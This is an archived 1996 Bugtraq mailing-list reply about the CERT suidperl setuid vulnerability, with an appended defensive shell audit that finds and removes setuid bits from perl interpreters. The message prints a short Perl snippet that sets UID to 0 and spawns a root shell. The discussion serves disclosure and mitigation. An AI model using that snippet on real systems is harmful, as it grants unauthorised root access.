[2842] in bugtraq


Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability

daemon@ATHENA.MIT.EDU (James Seng)
Sun Jun 30 12:55:10 1996

Date: 	Sun, 30 Jun 1996 17:34:07 +1000
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: James Seng <jseng@pobox.org.sg>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

Actually, it should be suidperl, not perl.

It should read as

#!/usr/bin/suidperl
$>=0; $<=0; # Set effective UID ($>) and real UID ($<) = 0
exec("/bin/sh");

According to the advisory, perl4 and 5 are both susceptible to it so long
as you have enabled setuid bit emulation (which is by default for most systems).

I just do "chmod u-s /usr/bin/*perl*" since I don't use it for suid scripts.

-James Seng

At 11:53 PM 6/29/96 -0400, Brian Tao wrote:
>    Exactly which versions of perl are susceptible to this?  I tried
>it using /usr/contrib/bin/perl on a BSD/OS 2.0 system as well as
>/usr/bin/perl on FreeBSD 2.1/2.2 systems, and none gave a root shell.
>--
>Brian Tao (BT300, taob@io.org, taob@ican.net)
>Systems and Network Administrator, Internet Canada Corp.
>"Though this be madness, yet there is method in't"
>
>
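
Added example (not part of the original message, and not code from the advisory or from perl): a shell audit built around the "chmod u-s" mitigation above. It lists setuid files named *perl*, lists setuid scripts whose #! line names perl, and clears the bit on the interpreters. The function names are hypothetical; pass the directories to check, e.g. /usr/bin.

```shell
#!/bin/sh
# Added example: audit for setuid perl interpreters and the setuid scripts
# that depend on them. Function names are hypothetical, not from any tool.

# List regular files named *perl* that carry the setuid bit.
find_suid_perl() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -name '*perl*' -perm -4000 2>/dev/null
    done
}

# List setuid scripts whose #! line names a perl interpreter. Review these
# before removing the bit from the interpreter, since they will stop
# running with elevated privileges afterwards.
find_suid_perl_scripts() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -perm -4000 2>/dev/null |
        while IFS= read -r f; do
            # First line only; drop NUL bytes so binaries do not cause warnings.
            first=$(head -n 1 "$f" 2>/dev/null | tr -d '\0')
            case $first in
                '#!'*perl*) printf '%s\n' "$f" ;;
            esac
        done
    done
}

# Clear the setuid bit on each interpreter found and report what changed.
# Same effect as the chmod u-s in the message, limited to files that
# actually have the bit set.
strip_suid_perl() {
    find_suid_perl "$@" | while IFS= read -r f; do
        chmod u-s "$f" && printf 'cleared setuid: %s\n' "$f"
    done
}
```

Run find_suid_perl and find_suid_perl_scripts first to see what is affected, then strip_suid_perl on the same directories.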
